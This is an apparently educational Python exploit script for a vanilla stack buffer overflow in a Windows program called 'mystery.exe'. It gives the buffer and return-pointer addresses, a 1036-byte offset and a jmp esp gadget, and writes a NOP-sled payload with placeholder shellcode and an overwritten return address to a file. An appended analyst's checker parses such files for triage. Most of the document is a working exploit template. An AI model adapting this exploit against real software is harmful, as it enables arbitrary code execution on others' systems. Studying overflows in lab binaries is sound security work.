exploit_mystery.py
# Name : Abhinav Thakur
# Email: [email protected]
# Description: This exploit code makes a binary file at "C:\hellothere.bin" which contains malicious
# data which when executed by the binary 'mystery.exe' will result in arbitrary code
# execution. A vanilla stack overflow exploit.
# Usage : Type the following commands while in directory of 'mystery.exe'
# > python exploit_mystery.py
# > mystery A B
# Useful information
# 0012fb68 : address of input buffer
# 0012ff74 : address of return pointer
# offset to return pointer = 1036 bytes
# ff e4 : jmp esp : exists at 7c941eed in ntdll
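import struct

# Place your shellcode here (bytes literal so the script also runs on Python 3)
shellcode = b"\xcc\xcc\xcc\xcc"

# NOP padding so that padding + shellcode fill the 1036 bytes up to the return pointer
payload = b"\x90" * (1036 - len(shellcode))
payload += shellcode
# Overwrite the return pointer with an address inside the input buffer (little-endian)
payload += struct.pack("<I", 0x12fb80)

# Creating the malicious binary "C:\hellothere.bin"
# Binary mode: text mode on Windows would rewrite 0x0a bytes as 0x0d 0x0a
with open(r"C:\hellothere.bin", "wb") as fo:
    fo.write(payload)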
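
An analyst's layout check for a file like the one this script writes, added here as an example and not part of the original repository. It uses the two addresses from the header comments and assumes the file's bytes are copied into the input buffer starting at offset 0; `analyze` and `sample_file` are hypothetical names.

```python
import struct

# Values taken from the header comments of exploit_mystery.py
BUF_ADDR = 0x0012FB68   # address of input buffer
RET_SLOT = 0x0012FF74   # address of return pointer


def analyze(data, buf_addr=BUF_ADDR, ret_slot=RET_SLOT):
    """Describe how a candidate input file maps onto the stack frame.

    Assumption: byte 0 of the file lands at buf_addr.
    """
    offset = ret_slot - buf_addr          # distance from buffer start to return slot
    report = {
        "offset": offset,
        "overwrites_ret": len(data) >= offset + 4,
        # Length of the leading run of 0x90 (NOP) bytes
        "sled_len": len(data) - len(data.lstrip(b"\x90")),
    }
    if report["overwrites_ret"]:
        # The 4 bytes that would replace the saved return pointer (little-endian)
        (new_ret,) = struct.unpack_from("<I", data, offset)
        rel = new_ret - buf_addr          # where that value points, relative to the buffer
        report["new_ret"] = new_ret
        report["ret_in_buffer"] = 0 <= rel < offset
        report["ret_in_sled"] = 0 <= rel < report["sled_len"]
    return report


def sample_file():
    """Constructed sample with the same layout as the script's output."""
    body = b"\xcc" * 4
    return b"\x90" * (1036 - len(body)) + body + struct.pack("<I", 0x12FB80)


if __name__ == "__main__":
    for key, value in analyze(sample_file()).items():
        print(key, hex(value) if key == "new_ret" else value)
```

A return value that points back into the input buffer (`ret_in_buffer`) is a useful triage signal, since execution there depends on the stack being executable and its address being fixed.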